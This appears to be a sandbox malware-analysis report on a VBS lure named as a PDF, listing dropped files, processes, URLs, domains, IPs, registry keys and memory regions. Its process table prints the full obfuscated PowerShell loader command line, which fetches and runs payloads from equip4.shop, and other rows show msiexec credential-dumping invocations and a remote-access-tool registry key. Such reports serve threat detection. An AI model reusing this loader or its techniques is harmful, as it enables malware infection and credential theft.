Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
MV STARSHIP AQUILA_pdf.vbs
|
ASCII text, with very long lines (1823), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em50y3k5.h0d.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jd0q4o2z.kpl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mt3serif.03r.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2aep3m4.xfw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv9E46.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x94216985, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ofdalrlortndq
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Plasmagel.Ref
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MV STARSHIP AQUILA_pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage
#>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function
Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous
-lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function
Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep.
la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite
Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo
R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer
'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn
oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet
(Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD
Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa
A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI
N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa)
Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege
ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU
A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer
'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o.
alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer
' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll
oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu
VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet
(Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF
e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf
mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M
lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB
onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer
' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il:
krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR
pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet
(Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn
GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl
F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa
]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet
(Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde
auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$
BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb
,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT
MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet
$Bomuldsgarnet;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage
#>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function
Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous
-lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function
Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep.
la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite
Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo
R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer
'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn
oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet
(Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD
Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa
A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI
N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa)
Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege
ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU
A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer
'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o.
alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer
' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll
oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu
VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet
(Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF
e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf
mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M
lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB
onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer
' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il:
krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR
pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet
(Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn
GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl
F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa
]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet
(Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde
auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$
BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb
,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT
MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet
$Bomuldsgarnet;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ofdalrlortndq"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\yzitlkwhfcfqsvnu"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bbodmcpjtkxucbcyfoug"
|
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin$
|
unknown
|
|
|
|
http://equip4.shop/FvMVdpFg/Atols.rarP
|
unknown
|
|
|
|
http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.binL
|
unknown
|
|
|
|
http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin
|
104.21.56.207
|
|
|
|
http://equip4.shop/FvMVdpFg/Atols.rarXR1l
|
unknown
|
|
|
|
http://equip4.shop/FvMVdpFg/Atols.rar
|
104.21.56.207
|
|
|
|
http://equip4.shop
|
unknown
|
|
|
|
154.216.18.214
|
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpjb5W7
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
|
http://crl.microsoftBp
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
|
unknown
|
||
|
https://maps.windows.com/windows-app-web-link
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
http://geoplugin.net/json.gpO
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://geoplugin.net/json.gpl0b
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
|
unknown
|
||
|
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
|
unknown
|
||
|
https://aka.ms/pscore6lBdq
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
|
unknown
|
||
|
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 63 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
||
|
equip4.shop
|
104.21.56.207
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.18.214
|
unknown
|
Seychelles
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
104.21.56.207
|
equip4.shop
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-AOD6MB
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
112F5F61000
|
trusted library allocation
|
page read and write
|
|
|
|
61A000
|
heap
|
page read and write
|
|
|
|
83B0000
|
direct allocation
|
page execute and read and write
|
|
|
|
57BE000
|
trusted library allocation
|
page read and write
|
|
|
|
666000
|
heap
|
page read and write
|
|
|
|
8C40000
|
direct allocation
|
page execute and read and write
|
|
|
|
30BA000
|
heap
|
page read and write
|
||
|
112FE61C000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
1F460000
|
direct allocation
|
page read and write
|
||
|
20123000
|
unclassified section
|
page execute and read and write
|
||
|
20130000
|
unclassified section
|
page execute and read and write
|
||
|
112E436D000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
252D000
|
stack
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
29266149000
|
heap
|
page read and write
|
||
|
69CE000
|
stack
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
81B4000
|
heap
|
page read and write
|
||
|
41CF000
|
stack
|
page read and write
|
||
|
112E4260000
|
heap
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
4762000
|
heap
|
page read and write
|
||
|
308C000
|
heap
|
page read and write
|
||
|
2528000
|
stack
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
7D20000
|
heap
|
page read and write
|
||
|
4163000
|
heap
|
page read and write
|
||
|
29267E6A000
|
heap
|
page read and write
|
||
|
625000
|
heap
|
page read and write
|
||
|
30D8000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
6A5D000
|
stack
|
page read and write
|
||
|
2001B000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
698000
|
heap
|
page read and write
|
||
|
47A5000
|
heap
|
page read and write
|
||
|
418E000
|
heap
|
page read and write
|
||
|
6FE000
|
heap
|
page read and write
|
||
|
29267E6B000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
720E000
|
stack
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
24EC000
|
stack
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
1FD21000
|
heap
|
page read and write
|
||
|
292660C6000
|
heap
|
page read and write
|
||
|
292660AF000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
60E000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page readonly
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
30F6000
|
heap
|
page read and write
|
